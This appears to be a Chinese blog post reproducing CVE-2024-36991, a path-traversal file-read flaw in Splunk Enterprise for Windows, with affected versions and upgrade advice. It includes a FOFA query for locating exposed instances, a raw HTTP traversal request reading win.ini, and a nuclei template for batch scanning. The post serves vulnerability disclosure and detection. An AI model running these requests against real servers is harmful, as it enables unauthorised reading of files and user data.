前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【漏洞复现】Splunk Enterprise 任意文件读取漏洞(CVE-2024-36991)

【漏洞复现】Splunk Enterprise 任意文件读取漏洞(CVE-2024-36991)

作者头像
没事就要多学习
发布2024-07-18 15:52:16
3560
发布2024-07-18 15:52:16
举报
文章被收录于专栏:Cyber Security
前言

Splunk Enterprise 是一款强大的机器数据管理和分析平台,能够实时收集、索引、搜索、分析和可视化来自各种数据源的日志和数据,帮助企业提升运营效率、增强安全性和优化业务决策。

漏洞名称

Splunk Enterprise 任意文件读取漏洞

漏洞编号

CVE-2024-36991

公开时间

2024-07-01

威胁类型

信息泄漏

漏洞描述

在特定版本的 Windows 版 Splunk Enterprise 中,未经身份认证的攻击者可以在 /modules/messaging/ 接口通过目录穿越的方式读取任意文件,造成用户信息的泄露。

影响版本

9.2 <= Splunk Enterprise < 9.2.2 9.1 <= Splunk Enterprise < 9.1.5 9.0 <= Splunk Enterprise < 9.0.10

漏洞复现

FOFA语法:

代码语言:javascript
复制
app="splunk-Enterprise"
POC
代码语言:javascript
复制
GET /zh-CN/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
在这里插入图片描述
在这里插入图片描述
批量检测-nuclei脚本
代码语言:javascript
复制
id: CVE-2024-36991

info:
  name: Splunk Enterprise for Windows 任意文件读取漏洞
  author: whgojp
  description:  Splunk Enterprise 是一款强大的数据分析软件,它允许用户从各种来源收集、索引和搜索机器生成的数据。2024年7月,官方发布安全通告,披露 CVE-2024-36991 Splunk Enterprise Windows平台 modules/messaging 目录遍历漏洞。漏洞仅影响 Windows平台上的 Splunk Enterprise,官方已发布安全更新,建议升级至最新版本。
  reference:
    - https://advisory.splunk.com/SVD-2024-0711
  tags: cve,cve2024,splunk-Enterpris

requests:
  - method: GET
    path:
      - "{{BaseURL}}/zh-CN/modules/messaging/{{Path}}"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "NetSetup.log"
        part: body
        condition: or
      - type: word
        words:
          - "Windows"
          - "debug"
        part: body
        condition: or

variables:
  Path:
    - "C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini"

修复建议

目前官方已有可更新版本,建议受影响用户升级至最新版本:

Splunk Enterprise 9.2.2 Splunk Enterprise 9.1.5 Splunk Enterprise 9.0.10

官方地址:https://www.splunk.com/zh_cn/download.html

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2024-07-09,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言
  • 漏洞描述
  • 影响版本
  • 漏洞复现
    • POC
      • 批量检测-nuclei脚本
      • 修复建议
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档